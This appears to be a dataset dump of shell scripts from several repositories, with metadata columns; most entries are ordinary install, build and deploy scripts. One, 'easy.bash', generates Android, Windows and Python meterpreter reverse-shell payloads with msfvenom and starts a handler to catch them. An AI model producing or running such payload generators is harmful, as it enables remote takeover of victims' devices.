blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
b4ac310e6baa6eaf4fbc986827b7c34de1505c0e
|
Shell
|
LiberatorUSA/GUCEF
|
/projects/k3s/github/create_github_runner_image.sh
|
UTF-8
| 568
| 2.828125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
#if [ $# -eq 0 ]
# then
# tag='latest'
# else
# tag=$1
#fi
# first get a listing of the current container for analysis
docker inspect summerwind/actions-runner:latest
# build the derived github runner build image
docker build -f github_runner_build_image.dockerfile . -t vanvelzen/github-runner-base:latest
# save the image as a local tar file
docker save --output ./vanvelzen-github-runner-base-latest.tar vanvelzen/github-runner-base:latest
# Import the image into k3s
sudo k3s ctr images import ./vanvelzen-github-runner-base-latest.tar
| true
|
505b616fde76421a8b79656758907f38b7104c8d
|
Shell
|
RestiSanchez/ASIR2-IAW-Practica08
|
/Fase_1/front.sh
|
UTF-8
| 3,009
| 3.21875
| 3
|
[] |
no_license
|
#!/bin/bash
set -x
#VARIABLES
DB_NAME=wordpress_db
DB_USER=wordpress_user
DB_PASSWORD=wordpress_password
IP_PRIVADA_FRONTEND=172.31.62.193
IP_PRIVADA_MYSQL_SERVER=172.31.53.230
IP_PUBLICA_FRONTEND=54.236.56.144
#Actualizamos
apt update
#Instalamos apache
apt install apache2 -y
#Instalamos los módulos PHP
apt install php libapache2-mod-php php-mysql -y
#Copiamos el archivo info.php a /var/www/html
cp /home/ubuntu/info.php /var/www/html
#Reiniciamos el servicio de Apache
systemctl restart apache2
#Añadimos la URL del Wordpress
cd /var/www/html
wget http://wordpress.org/latest.tar.gz
#Descomprimimos el .tar.gz
tar -xzvf latest.tar.gz
#Eliminamos el tar.gz
rm latest.tar.gz
#Configuramos el archivo de configuración de Wordpress
cd /var/www/html/wordpress
mv wp-config-sample.php wp-config.php
sed -i "s/database_name_here/$DB_NAME/" wp-config.php
sed -i "s/username_here/$DB_USER/" wp-config.php
sed -i "s/password_here/$DB_PASSWORD/" wp-config.php
sed -i "s/localhost/$IP_PRIVADA_MYSQL_SERVER/" wp-config.php
#Habilitamos las variables WP_SITEURL y WP_HOME
sed -i "/DB_COLLATE/a define('WP_SITEURL', 'http://$IP_PUBLICA_FRONTEND/wordpress');" /var/www/html/wordpress/wp-config.php
sed -i "/WP_SITEURL/a define('WP_HOME', 'http://$IP_PUBLICA_FRONTEND');" /var/www/html/wordpress/wp-config.php
#Copiar el archivo wordpress /index.php a /var/www/html
cp /var/www/html/wordpress/index.php /var/www/html
#Editamos el archivo wordpress /index.php
sed -i "s#wp-blog-header.php#wordpress/wp-blog-header.php#" /var/www/html/index.php
#Habilitamos el módulo mod_rewrite de Apache
a2enmod rewrite
cd /home/ubuntu
#Copiamos el archivo htaccess a /var/www/html
cp ASIR2-IAW-Practica08/Fase_1/htaccess /var/www/html/.htaccess
#Copiamos el archivo de configuración de Apache
cp ASIR2-IAW-Practica08/Fase_1/000-default.conf /etc/apache2/sites-available/000-default.conf
#Reiniciamos Apache
systemctl restart apache2
#Configuramos el archivo wp-config.php
sed -i "/AUTH_KEY/d" /var/www/html/wordpress/wp-config.php
sed -i "/SECURE_AUTH_KEY/d" /var/www/html/wordpress/wp-config.php
sed -i "/LOGGED_IN_KEY/d" /var/www/html/wordpress/wp-config.php
sed -i "/NONCE_KEY/d" /var/www/html/wordpress/wp-config.php
sed -i "/AUTH_SALT/d" /var/www/html/wordpress/wp-config.php
sed -i "/SECURE_AUTH_SALT/d" /var/www/html/wordpress/wp-config.php
sed -i "/LOGGED_IN_SALT/d" /var/www/html/wordpress/wp-config.php
sed -i "/NONCE_SALT/d" /var/www/html/wordpress/wp-config.php
#Hacemos una llamada a la API de wordpress para obtener las security keys
SECURITY_KEYS=$(curl https://api.wordpress.org/secret-key/1.1/salt/)
#Reemplaza el carácter / por el carácter _
SECURITY_KEYS=$(echo $SECURITY_KEYS | tr / _)
#Añadimos los security keys al archivo
sed -i "/@-/a $SECURITY_KEYS" /var/www/html/wordpress/wp-config.php
# Eliminamos el archivo index.html del /var/www/html
rm -f /var/www/html/index.html
# Cambiamos el propietario y el grupo al directorio /var/www/html
chown www-data:www-data /var/www/html/ -R
| true
|
ad4f687870a44ea332329fc85dcbdaaee0bca331
|
Shell
|
dyylam/easymsf
|
/easy.bash
|
UTF-8
| 1,412
| 3.109375
| 3
|
[] |
no_license
|
#!/bin/bash
i="0"
resize -s 27 80
clear
while [ $i -lt 1 ]
do
clear
ip=$(ip addr show wlan0 | awk '/inet / {print $2}' | cut -d/ -f 1 )
echo -e '\e[1:33m
\e[1;32m
IP = $ip
(1) Android Malicious
(2) Windows Evil
(3) Python BadShell
'
service postgresql start
apk='1'
exe='2'
py='3'
read x
if [ "$x" == "$apk" ]; then
msfvenom -p android/meterpreter/reverse_tcp lhost=$ip lport=4444 -f apk > /sdcard/app.apk
echo -e '
!!!!!!!!!!!!!!!!!
!!Payload listo!!
!!!!!!!!!!!!!!!!!
'
msfconsole -q " use exploit/multi/handler; set payload android/meterpreter/reverse_tcp ; set lhost=$ip ; set lport=4444 ; exploit ;"
elif [ "$x" == "$exe" ]; then #EXE
msfvenom -p windows/meterpreter/reverse_tcp lhost=$ip lport=4444 -f exe > /sdcard/evil.exe
echo -e '
!!!!!!!!!!!!!!!!!
!!Payload listo!!
!!!!!!!!!!!!!!!!!
'
msfconsole -q -x " use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost $ip ; set lport 4444 ; exploit ;"
elif [ "$x" == "$py" ]; then #PYTHON
msfvenom -p python/meterpreter/reverse_tcp lhost=$ip lport=4444 > /sdcard/ducky.py
echo -e '
!!!!!!!!!!!!!!!!!
!!Payload listo!!
!!!!!!!!!!!!!!!!!
'
msfconsole -q -x " use exploit/multi/handler; set payload python/meterpreter/reverse_tcp; set lhost $ip ; set lport 4444 ; exploit ;"
read
else
n
fi
done
| true
|
2692366d3a9ad19b4760c5df02dfd11e5d9c1372
|
Shell
|
eduardoefb/rainv
|
/files/scripts/update_v2.sh
|
UTF-8
| 6,426
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/bash
#functions:
function f_customer(){
rm $SCRIPT_DIR/cust_run 2>/dev/null
echo 1 > $SCRIPT_DIR/cust_run
$SCRIPT_DIR/find_customer.sh $f >> $SCRIPT_DIR/update.log
rm $SCRIPT_DIR/cust_run 2>/dev/null
}
function update_log(){
rm $SCRIPT_DIR/log_run 2>/dev/null
echo 1 > $SCRIPT_DIR/log_run
$PARSE_LOG_CMD >> $SCRIPT_DIR/update.log
rm $SCRIPT_DIR/log_run 2>/dev/null
}
function update_xml(){
rm $SCRIPT_DIR/xml_run 2>/dev/null
echo 1 > $SCRIPT_DIR/xml_run
for f in `find $NE_LOG_DIR"/" -name .id`; do
id=`cat $f`
path=`echo $f | sed 's/\.id//g'`
echo "Finding XML, DAT, CSV for parsing on $path" >> $SCRIPT_DIR/update.log
$PARSE_XML_CMD -i $path*{.xml,.dat,.csv} -c $id >> $SCRIPT_DIR/update.log
done
rm $SCRIPT_DIR/xml_run 2>/dev/null
}
function dropbox_stop(){
su - $DROPBOX_USER << EOF
dropbox stop 2>/dev/null
EOF
}
function dropbox_start(){
su - $DROPBOX_USER << EOF
dropbox start 2>/dev/null
EOF
}
function get_dropbox_link(){
dropbox_stop
sleep 30
dropbox_start
sleep 10
su - $DROPBOX_USER > $WORK_DIR/scripts/dropbox_link << EOF
dropbox sharelink ~/Dropbox/Public/RA_Data
EOF
}
#Constants:
source /opt/nokia/nedata/scripts/var.conf
export SCRIPT_RUNNING_FILE_INDICATION=$TMP_LOG_UPLOAD_DIR"/run"
#Variables:
unset customer
unset cust_changed
#Check if the file $SCRIPT_RUNNING_FILE_INDICATION exists, if yes, start script. If no: stop
if [ ! -f $SCRIPT_RUNNING_FILE_INDICATION ]; then
exit
fi
#Remove the current_database directories:
for dire in $(find $WORK_DIR/logs -name *-current_database); do
rm -rfv $dire
done
rm $SCRIPT_RUNNING_FILE_INDICATION
#Copy the files, if exists
for f in `ls $TMP_LOG_UPLOAD_DIR/*.zip 2>/dev/null`; do
f_customer $f &
sleep 10
while [ -f $SCRIPT_DIR/cust_run ]; do
lin=`tail -1 $SCRIPT_DIR/update.log` # > /tmp/status
lin1=`echo Processing: $f`
rm /tmp/status 2>/dev/null
echo $lin1 > /tmp/status
mv /tmp/status $SCRIPT_EXEC_STATUS_FILE
sleep 5
done
rm $f 2>/dev/null
done
#Find the directories where customer logs are located:
changes=0
for fle in `find $NE_LOG_DIR"/" -name .id`; do
cid=`cat $fle`
cid=$(($cid-1))
cname=`echo $fle | awk -F '/' '{print $6}'`
customer[cid]=$cname
cust_changed[cid]=0
cust_changed[cid]=`ls -l $NE_LOG_DIR"/"$cname"/" | grep -v "\.old" | grep -v "\-current" | grep -v total | wc -l`
changes=$(($changes+${cust_changed[cid]}))
done
#If there is no changes, abort script:
if [ $changes -eq 0 ]; then
exit
fi
#If there are changes, continue the script:
#Update dropbox shared link:
get_dropbox_link
#Stop dropbox:
dropbox_stop
#Start script, if $SCRIPT_RUNNING_FILE doesn't exist
if [ ! -f $SCRIPT_RUNNING_FILE ]; then
echo "1" > $SCRIPT_RUNNING_FILE
#Remove tmp files:
rm $SCRIPT_DIR/update.log 2>/dev/null
cat /dev/null >> $SCRIPT_DIR/update.log
#remove #current_database files:
#find /opt/nokia/nedata/logs/ -name *-current_database -exec rm -rf {}; 2>/dev/null
echo "Updating state information files..." > $SCRIPT_EXEC_STATUS_FILE
$SCRIPT_DIR/chk_state.sh > $SCRIPT_DIR/update.log
#Remove old files:
for fle in `find $NE_LOG_DIR"/" -name .id`; do
cid=`cat $fle`
cid=$(($cid-1))
cname=`echo $fle | awk -F '/' '{print $7}'`
rm -rfv $NE_LOG_DIR"/"$cname"/*-old" >> $SCRIPT_DIR/update.log
done
#This php script will get the data from log files:
update_log&
sleep 10
while [ -f $SCRIPT_DIR/log_run ]; do
lin=`tail -1 $SCRIPT_DIR/update.log` # > /tmp/status
if [ `echo $lin | grep -i "(" | wc -l` -gt 0 ]; then
lin1=`echo Updating: $lin`
rm /tmp/status 2>/dev/null
echo $lin1 > /tmp/status
mv /tmp/status $SCRIPT_EXEC_STATUS_FILE
fi
sleep 5
done
#This function will call the java xml parser to get the data from xml files:
update_xml&
sleep 10
while [ -f $SCRIPT_DIR/xml_run ]; do
lin=`tail -1 $SCRIPT_DIR/update.log` # > /tmp/status
if [ `echo $lin | grep -i $NE_LOG_DIR"/" | wc -l` -gt 0 ]; then
lin1=`echo Updating: $lin | sed 's/$NE_LOG_DIR//g'`
rm /tmp/status 2>/dev/null
echo $lin1 > /tmp/status
mv /tmp/status $SCRIPT_EXEC_STATUS_FILE
fi
sleep 5
done
if [ `cat $SCRIPT_DIR/update.log | wc -l` -eq 0 ]; then
for file_ext in csv dat xml; do
if [ `find $NE_LOG_DIR"/" -name *.$file_ext | wc -l` -gt 0 ]; then
echo "Found $file_ext files to parse" >> $SCRIPT_DIR/update.log
fi
done
fi
if [ `cat $SCRIPT_DIR/update.log | wc -l` -gt 0 ]; then
rm -rf $SCRIPT_DIR/xlsfiles 2>/dev/null
mkdir -p $SCRIPT_DIR/xlsfiles
cid=0
rm -rf $SCRIPT_DIR/xlsfiles/ 2>/dev/null
$SCRIPT_DIR/creategraph.sh 2>/dev/null
for c in ${customer[*]}; do
if [ ${cust_changed[cid]} -gt 0 ]; then
rm /tmp/status 2>/dev/null
echo "Creating excel files for $c..." > /tmp/status
mv /tmp/status $SCRIPT_EXEC_STATUS_FILE
mkdir -p $SCRIPT_DIR/xlsfiles/$c
$GENERATE_DATA_CMD -c $(($cid+1)) -d $SCRIPT_DIR/xlsfiles/$c/ >> $SCRIPT_DIR/update.log 2 >> $SCRIPT_DIR/update.log
#Copy files to history directory:
mkdir -p $SCRIPT_DIR/xls_history/$c/
cp -r $SCRIPT_DIR/xlsfiles/$c/* $SCRIPT_DIR/xls_history/$c/
#Copy files to dropbox shared directory:
cp -r $SCRIPT_DIR/xlsfiles/$c/ /home/$DROPBOX_USER/Dropbox/Public/RA_Data/
#Copy files to the XLS_DL_DIR/
mkdir -p $XLS_DL_DIR 2>/dev/null
rm -rf $XLS_DL_DIR/$c.zip 2>/dev/null
pushd $SCRIPT_DIR/xlsfiles/
zip -r $XLS_DL_DIR/$c.zip $c/*
popd
chown -R apache.apache $XLS_DL_DIR"/" 2>/dev/null
sleep 5
fi
cid=$(($cid+1))
done
fi
sleep 10
rm $SCRIPT_RUNNING_FILE
echo "Updated" > $SCRIPT_EXEC_STATUS_FILE
#Copy files from XLS_DL_DIR
#Start Dropbox:
dropbox_start
fi
| true
|
d86c6e40de1ba8414e732b6825adcdf8d0c0ec91
|
Shell
|
gpincheiraa/bln-frontend-project1
|
/ci/deploy
|
UTF-8
| 1,183
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
echo "============================================================="
echo "============================================================="
echo " CONFIGURANDO DATOS BILLETERA BITCOIN "
echo "============================================================="
echo '{ "address": "'$BITCOIN_ADDRESS'" }' > btc-config.json
echo ls -lha | grep btc-config.json
echo "============================================================="
echo " CONSTRUYENDO APLICACIÓN "
echo "============================================================="
npm run build
echo "============================================================="
echo " ESTRUCTURA APLICACIÓN FRONTEND "
echo "============================================================="
ls -lha dist
echo "============================================================="
echo " GENERAR ESTRUCTURA APLICACIÓN BACKEND "
echo "============================================================="
mkdir -p public && cp -R dist/. ./public/
cp server/server.js .
ls -lha
echo "============================================================="
| true
|
a8286f1d7507c462bd4e6c571f31511bc0d74484
|
Shell
|
christian-posta/istio-demos
|
/cert-rotation/verify-certs.sh
|
UTF-8
| 774
| 2.640625
| 3
|
[] |
no_license
|
BASE="./certs"
ROOTA_DIR="$BASE/ROOTA"
ROOTB_DIR="$BASE/ROOTB"
INTERMEDIATE_A="$BASE/intermediate-rootA"
INTERMEDIATE_A2="$BASE/intermediate-rootA2"
INTERMEDIATE_B="$BASE/intermediate-rootB"
echo "verifying root certs for CA-A"
diff $ROOTA_DIR/certs/root_ca.crt $INTERMEDIATE_A/root-cert.pem
step certificate verify $INTERMEDIATE_A/ca-cert.pem --roots $INTERMEDIATE_A/root-cert.pem
echo "verifying root certs for CA-A2"
diff $ROOTA_DIR/certs/root_ca.crt $INTERMEDIATE_A2/root-cert.pem
step certificate verify $INTERMEDIATE_A2/ca-cert.pem --roots $INTERMEDIATE_A2/root-cert.pem
echo "verifying root certs for CA-B"
diff $ROOTB_DIR/certs/root_ca.crt $INTERMEDIATE_B/root-cert.pem
step certificate verify $INTERMEDIATE_B/ca-cert.pem --roots $INTERMEDIATE_B/root-cert.pem
| true
|
aa560b22cf93dc97207ba467e202434482c7d85d
|
Shell
|
bresilla/dotfiles
|
/.func/wm/sshoot
|
UTF-8
| 969
| 3.125
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
screenshot_file=/tmp/$(date +%s).png;
echo $screenshot_file > /tmp/screenshot_file;
accent=$(cat /home/bresilla/.cache/wal/colors | head -2 | tail -1)
if [[ $1 == "--show" ]]; then
maim -u -s | tee $screenshot_file | xclip -sel clip -t image/png -i
sxiv $screenshot_file
elif [[ $1 == "--maim" ]]; then
maim -u -s | tee $screenshot_file | xclip -sel clip -t image/png -i
elif [[ $1 == "--ocr" ]]; then
TEXT_FILE="/tmp/ocr.txt"
IMAGE_FILE="/tmp/ocr.png"
maim -u -s | tee $IMAGE_FILE | xclip -sel clip -t image/png -i
tesseract "$IMAGE_FILE" "${TEXT_FILE//\.txt/}" 2> /dev/null
sed -i 's/\x0c//' "$TEXT_FILE"
NUM_LINES=$(wc -l < $TEXT_FILE)
if [ "$NUM_LINES" -eq 0 ]; then
notify-send "ocr" "no text was detected"
exit 1
fi
xclip -selection clip < "$TEXT_FILE"
rm "$TEXT_FILE"
rm "$IMAGE_FILE"
fi
adb push $screenshot_file /sdcard/From_Skynet
# sxiv $screenshot_file &
| true
|
22bda95b91822ae52ef7d4782eeccbce35e198c1
|
Shell
|
jumerkel/opsi-server
|
/scripts/opsiconfd
|
UTF-8
| 4,877
| 3.5625
| 4
|
[] |
no_license
|
#!/bin/sh
#
### BEGIN INIT INFO
# Provides: opsiconfd
# Required-Start: $network $local_fs $remote_fs mysql
# Required-Stop: $network $local_fs $remote_fs mysql
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Description: opsi config service
# Description: Opsi Configuration Service
### END INIT INFO
# chkconfig: 2345 80 20
DAEMON=/usr/bin/opsiconfd
# This user must have read access to /etc/shadow
USER=opsiconfd
LOGDIR=/var/log/opsi/opsiconfd
PIDDIR=/var/run/opsiconfd
LIBDIR=/var/lib/opsiconfd
MBUSDIR=/var/run/opsi-message-bus
RRDDIR=$LIBDIR/rrd
PIDFILE=$PIDDIR/opsiconfd.pid
START_GUARD=0
GUARD_BIN=/usr/bin/opsiconfd-guard
FQDN=$(hostname -f)
GLOBAL_CONF=/etc/opsi/global.conf
# See if the binary is there
if [ ! -x $DAEMON ]; then
echo "$DAEMON not installed"
[ "$1" = "stop" ] && exit 0
exit 5
fi
if [ -e $GLOBAL_CONF ]; then
for kv in $(cat $GLOBAL_CONF | grep -v '^[#;]' | grep '=');
do eval $kv
done
#if [ ${opsi_message_bus_socket:0:5} = "/var/" ]; then
# MBUSDIR=$(dirname $opsi_message_bus_socket)
#fi
fi
start() {
echo -n "Starting opsi config service.."
# Kill opsiconfd-guard
killall $(basename $GUARD_BIN) 1>/dev/null 2>/dev/null
# Make sure files are writable
test -e $LOGDIR || mkdir -p $LOGDIR
chown -R $USER $LOGDIR
test -e $LIBDIR || mkdir -p $LIBDIR
chown -R $USER $LIBDIR
test -e $RRDDIR || mkdir -p $RRDDIR
chown -R $USER $RRDDIR
test -e $PIDDIR || mkdir -p $PIDDIR
chown -R $USER $PIDDIR
test -e $MBUSDIR || mkdir -p $MBUSDIR
chown -R $USER $MBUSDIR
if [ -f $PIDFILE ] && ps h $(cat $PIDFILE) >/dev/null 2>/dev/null; then
echo ". (already running)."
[ "$START_GUARD" = "1" ] && $GUARD_BIN &
exit 0
else
[ -f $PIDFILE ] && rm $PIDFILE
# Copy server cert / key if running on ucs
if [ -e "/etc/univention/ssl/$FQDN/cert.pem" -a -e "/etc/univention/ssl/$FQDN/private.key" ]; then
cat /etc/univention/ssl/$FQDN/private.key > /etc/opsi/opsiconfd.pem
grep -A 50 "BEGIN CERTIFICATE" /etc/univention/ssl/$FQDN/cert.pem >> /etc/opsi/opsiconfd.pem
chmod 600 /etc/opsi/opsiconfd.pem
chown $USER:opsiadmin /etc/opsi/opsiconfd.pem || true
fi
if [ -e /etc/opsi/backends/univention.conf -a -e /etc/machine.secret ]; then
LDAP_SECRET=$(cat /etc/machine.secret)
sed -i "s/^password\s*=.*/password = \"${LDAP_SECRET}\"/" /etc/opsi/backends/univention.conf
fi
su - $USER -c "$DAEMON -D"
pidfileseen=0
running=false
i=1
while [ $i -le 10 ]; do
echo -n "."
if ([ -f $PIDFILE ] && ps h $(cat $PIDFILE) >/dev/null 2>/dev/null); then
pidfileseen=$(($pidfileseen+1))
if [ $pidfileseen -ge 3 ]; then
running=true
break
fi
else
if [ $pidfileseen -ge 1 ]; then
running=false
break
fi
fi
sleep 1
i=$(($i+1))
done
if [ "$running" = "true" ]; then
[ "$START_GUARD" = "1" ] && $GUARD_BIN &
echo " (done)."
else
echo " (failed)."
exit 1
fi
fi
if ! su $USER -c "test -r /etc/shadow"; then
echo ""
echo " WARNING: User $USER lacks read permission for /etc/shadow."
echo " PAM authentication will fail."
echo ""
fi
}
stop() {
echo -n "Stopping opsi config service.."
# Kill opsiconfd-guard
killall $(basename $GUARD_BIN) >/dev/null 2>/dev/null || true
if [ -f $PIDFILE ] && ps h $(cat $PIDFILE 2>/dev/null) >/dev/null 2>/dev/null; then
kill $(cat $PIDFILE 2>/dev/null) >/dev/null 2>/dev/null || true
running=true
i=1
while [ "$running" = "true" -a $i -le 10 ]; do
echo -n "."
if ([ -f $PIDFILE ] && ps h $(cat $PIDFILE 2>/dev/null) >/dev/null 2>/dev/null); then
sleep 1
i=$(($i+1))
else
running=false
fi
done
[ -f $PIDFILE ] && kill -9 $(cat $PIDFILE 2>/dev/null) >/dev/null 2>/dev/null || true
echo " (done)."
else
opsiconfd_pids=""
for pid in $(ps -A | grep opsiconfd | sed s'/^\s*//' | cut -d' ' -f1); do
[ -d "/proc/$pid" -a "$pid" != "$$" ] && opsiconfd_pids="$opsiconfd_pids $pid"
done
if [ "$opsiconfd_pids" = "" ]; then
echo ". (not running)."
else
kill -9 $opsiconfd_pids >/dev/null 2>/dev/null || true
echo " (done)."
fi
fi
[ -f $PIDFILE ] && rm $PIDFILE >/dev/null 2>/dev/null || true
}
case "$1" in
start)
start
;;
stop)
stop
;;
reload)
echo -n "Reloading opsi config service... "
if [ -f $PIDFILE ] && ps h $(cat $PIDFILE) > /dev/null; then
kill -1 $(cat $PIDFILE) >/dev/null 2>/dev/null
echo "(done)."
else
echo "(not running)."
fi
;;
restart|force-reload)
stop
sleep 1
start
;;
status)
echo -n "Checking opsi config service... "
if [ -f $PIDFILE ] && ps h $(cat $PIDFILE) > /dev/null; then
echo "(running)."
exit 0
fi
echo "(not running)."
exit 1
;;
*)
echo "Usage: /etc/init.d/opsiconfd {start|stop|status|reload|restart|force-reload}"
exit 1
;;
esac
exit 0
| true
|
428078d3c1cf99a7e722662100ada03f9f3a5f55
|
Shell
|
bitcoin-cash-node/bitcoin-cash-node
|
/cmake/utils/gen-doc-md.sh.in
|
UTF-8
| 6,127
| 3.46875
| 3
|
[
"MIT"
] |
permissive
|
#!/usr/bin/env bash
# Copyright (c) 2020-2021 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
export LC_ALL=C
set -e
cd "@CMAKE_CURRENT_BINARY_DIR@"
rm -f mkdocs.yml
rm -rf md
mkdir md
cd "@CMAKE_SOURCE_DIR@"
find . \( \
-name '*.md' \
-a -not -path './*/*.md' \
-o -path './contrib/*.md' \
-o -path './depends/*.md' \
-o -path './share/*.md' \
-o -path './share/examples/*' \
-o -path './src/*.md' \
-o -path './test/*.md' \
-o -path './doc/*.md' \
-o -path './doc/*.png' \
-o -path './doc/*.svg' \
-o -path './doc/*.css' \) \
-a -not -path './doc/html/*' \
-print0 \
| tar cf - --null -T - \
| tar xf - --directory "@CMAKE_CURRENT_BINARY_DIR@/md"
cd "@CMAKE_CURRENT_BINARY_DIR@"
# Create Markdown version of license.
first=1
while IFS= read -r line; do
if [ $first == 1 ]; then
echo "# $line" > md/COPYING.md
first=0
else
echo " $line" >> md/COPYING.md
fi
done < "@CMAKE_SOURCE_DIR@/COPYING"
sed -i s/\]\(COPYING\)/\]\(COPYING.md\)/ md/README.md
# Generate command-line interface documentation.
mkdir -p md/doc/cli
"@CMAKE_SOURCE_DIR@/contrib/devtools/cli-help-to-markdown.py" "$(../src/bitcoind -??)" > md/doc/cli/bitcoind.md
if [ "@CMAKE_SYSTEM_NAME@" == "Darwin" ]; then
"@CMAKE_SOURCE_DIR@/contrib/devtools/cli-help-to-markdown.py" "$("../src/qt/@BITCOIN_QT_OSX_BUNDLE_NAME@.app/Contents/MacOS/@BITCOIN_QT_OSX_BUNDLE_NAME@" -??)" > md/doc/cli/bitcoin-qt.md
else
"@CMAKE_SOURCE_DIR@/contrib/devtools/cli-help-to-markdown.py" "$(../src/qt/bitcoin-qt -??)" > md/doc/cli/bitcoin-qt.md
fi
"@CMAKE_SOURCE_DIR@/contrib/devtools/cli-help-to-markdown.py" "$(../src/bitcoin-cli -?)" > md/doc/cli/bitcoin-cli.md
"@CMAKE_SOURCE_DIR@/contrib/devtools/cli-help-to-markdown.py" "$(../src/bitcoin-tx -?)" > md/doc/cli/bitcoin-tx.md
"@CMAKE_SOURCE_DIR@/contrib/devtools/cli-help-to-markdown.py" "$(../src/seeder/bitcoin-seeder -?)" > md/doc/cli/bitcoin-seeder.md
# Start a regtest node in a temporary data directory.
mkdir -p md/doc/json-rpc/tmp
../src/bitcoind -daemon -debuglogfile=0 -regtest -datadir="@CMAKE_CURRENT_BINARY_DIR@/md/doc/json-rpc/tmp" -rpcuser=gen-manpages -rpcpassword=gen-manpages
# Get daemon version which will be included in footer.
version="$(../src/bitcoind -version | head -n1)"
# Iterate over the existing mkdocs file and locate the entry for json-rpc/README.md.
while IFS= read -r line; do
# Copy existing mkdocs entries into the new mkdocs file.
# Remove draft release notes from menu for online publication.
if [ "@DOC_ONLINE@" == "OFF" ] || [ "${line: -21}" != " doc/release-notes.md" ]; then
echo "$line" >> mkdocs.yml
fi
# Find the json-rpc/README.md entry.
if [ "${line: -23}" == " doc/json-rpc/README.md" ]; then
indentation="${line%%-*}"
# The list of RPC commands will be inserted into the new mkdocs file below the readme entry.
# Get the list of RPC commands from the node and process it.
{
echo "Bitcoin Cash Node JSON-RPC commands"
echo "==================================="
} > md/doc/json-rpc/README.md
../src/bitcoin-cli -rpcwait -regtest -datadir="@CMAKE_CURRENT_BINARY_DIR@/md/doc/json-rpc/tmp" -rpcuser=gen-manpages -rpcpassword=gen-manpages help | while read -r helpline; do
if [ -n "$helpline" ]; then
if [[ "$helpline" =~ ^==[[:space:]](.*)[[:space:]]==$ ]]; then
# Found a category.
category="${BASH_REMATCH[1]}"
# Write category to new mkdocs file.
echo "$indentation- $category:" >> mkdocs.yml
# Write category to readme file.
{
echo
echo "## $category"
echo
} >> md/doc/json-rpc/README.md
else
# Found a command.
command=${helpline%% *}
# Write command to new mkdocs file.
echo "$indentation - $command: doc/json-rpc/$command.md" >> mkdocs.yml
# Create command help page.
"@CMAKE_SOURCE_DIR@/contrib/devtools/rpc-help-to-markdown.py" "$(../src/bitcoin-cli -rpcwait -regtest -datadir="@CMAKE_CURRENT_BINARY_DIR@/md/doc/json-rpc/tmp" -rpcuser=gen-manpages -rpcpassword=gen-manpages help $command)" > "md/doc/json-rpc/$command.md"
{
echo
echo "***"
echo
echo "*$version*"
} >> "md/doc/json-rpc/$command.md"
# Write command to readme file.
if [ "$command" == "$helpline" ]; then
echo "* [**\`$command\`**]($command.md)" >> md/doc/json-rpc/README.md
else
echo "* [**\`$command\`**\` ${helpline:${#command}}\`]($command.md)" >> md/doc/json-rpc/README.md
fi
fi
fi
done
{
echo
echo "***"
echo
echo "*$version*"
} >> md/doc/json-rpc/README.md
fi
done < "@CMAKE_CURRENT_SOURCE_DIR@/mkdocs.yml.in"
# Stop the regtest node.
../src/bitcoin-cli -rpcwait -regtest -datadir="@CMAKE_CURRENT_BINARY_DIR@/md/doc/json-rpc/tmp" -rpcuser=gen-manpages -rpcpassword=gen-manpages stop
# Remove the temporary node data directory.
rm -r md/doc/json-rpc/tmp
if [ "@DOC_ONLINE@" == "OFF" ]; then
# Directory URLs do not work when browsing local HTML files, so disable them.
echo "use_directory_urls: false" >> mkdocs.yml
# Search plug-in does not work when browsing local HTML files (due to same-origin policy), so disable it.
echo "plugins: []" >> mkdocs.yml
else
# Delete next release draft release notes for online publication.
rm md/doc/release-notes.md
# Append warning about possible API changes in master branch.
file_list=(md/doc/cli/*.md)
for md in "${file_list[@]}"; do
{
echo ""
echo "***"
} >> "$md"
done
file_list=(md/doc/cli/*.md md/doc/json-rpc/*.md)
for md in "${file_list[@]}"; do
{
echo ""
echo "<small>Documentation on docs.bitcoincashnode.org reflects the current master branch in Git, and may include API changes that are not yet present in the latest release.</small>"
} >> "$md"
done
fi
| true
|
fa8935ce64ab9d7d24a1702ecccc1efc479294f8
|
Shell
|
ryosebach/dotfiles
|
/etc/init/osx/03_brew_app_install.sh
|
UTF-8
| 339
| 2.75
| 3
|
[] |
no_license
|
#!/bin/sh
test -r ~/.dotfiles/etc/install && . ~/.dotfiles/etc/install && os_detect
e_arrow "brew application installing"
BrewApp=(
the_platinum_searcher
go
peco
ghq
tig
gibo
wget
nkf
ghostscript
hub
tree
graphviz
neovim
python
python@2
)
for app in ${BrewApp[@]}; do
brew install $app
done
e_success "brew application is installed"
| true
|
1b71044694444bc5361a28b09b9f857430f3508f
|
Shell
|
Joanna4983/MITM-repo
|
/prober.sh
|
UTF-8
| 240
| 2.640625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
for nr in {1..255}
do
ping -c 1 -W 0.2 192.168.43.$nr > /dev/null & ## Possible error here if not on correct network when running
if ! (($nr % 51)); then
arp -a >> /root/PycharmProjects/MITM/hosts2.txt
fi
done
exit 0
| true
|
ed8b65351e184af7632e13731d863335107b154b
|
Shell
|
rezacloner1372/MysqlBAckup
|
/mysqldump.sh
|
UTF-8
| 1,570
| 3.4375
| 3
|
[] |
no_license
|
##########please make these directory#############
#mkdir last #
#mkdir Backup-last #
#mkdir Backup-old #
#mkdir /BACKUP_old/weekly #
#mkdir /BACKUP_old/monthly #
##################################################
#!/bin/bash
BACKUP_last="/Backup-last"
BACKUP_old="/Backup-old"
TODAY=$(date +"%Y-%m-%d")
MYSQL_USER="root"
MYSQL_PASSWORD="YOUR PASSWORD"
MYSQL=/usr/bin/mysql
MYSQLDUMP=/usr/bin/mysqldump
DAILY_DELETE_NAME="daily-"`date +"%Y-%m-%d" --date '7 days ago'`
WEEKLY_DELETE_NAME="weekly-"`date +"%Y-%m-%d" --date '4 weeks ago'`
MONTHLY_DELETE_NAME="monthly-"`date +"%Y-%m-%d" --date '12 months ago'`
DB="YOUR DATABASE NAME"
